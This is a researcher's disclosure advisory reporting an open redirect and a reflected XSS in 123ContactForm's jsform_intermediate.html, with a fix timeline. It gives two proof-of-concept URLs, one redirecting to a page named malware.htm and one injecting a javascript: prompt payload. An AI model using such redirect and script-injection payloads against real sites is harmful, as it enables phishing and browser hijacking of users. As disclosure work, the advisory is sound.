WS201516 - Open Redirect and Reflected XSS on 123ContactForm
by David Sopas @dsopas
www.websegura.net
Description:
123ContactForm is a service developed by a young enthusiastic team located in Timisoara, Romania, EU. Founded in 2008, 123ContactForm has become a worldwide top class online form and survey builder.
While visiting a client of 123contactform.com, I noticed a strange request from their site to 123ContactForm.
What I found was an Open Redirect and a reflected XSS in jsform_intermediate.html: the page takes its url parameter as a redirect target without validating the scheme or the host. A malicious user could use it to forward victims to malicious sites, spread malware, phish for credentials and, with a javascript: URL, run script in the 123contactform.com origin and hijack victims' browsers.
Proof-of-concept:
Open Redirect
http://www.123contactform.com/jsform_intermediate.html?url=http://www.websegura.net/malware.htm&xdm_e=http%3A%2F%2Fwww.cliente_123contactform.net&xdm_c=default6100&xdm_p=1
XSS
http://www.123contactform.com/jsform_intermediate.html?url=javascript:prompt(document.domain)&xdm_e=http%3A%2F%2Fwww.cliente_123contactform.net&xdm_c=default6100&xdm_p=1
123ContactForm fixed this issue and put my name on their security acknowledgements list.
Timeline:
08 May 2015 - Sent the security issue to 123ContactForm
23 May 2015 - Reply from 123ContactForm telling that they are fixing it
26 Jun 2015 - 123ContactForm applied a fix
21 Jul 2015 - My name is added on their security acknowledgements list
22 Jul 2015 - Full disclosure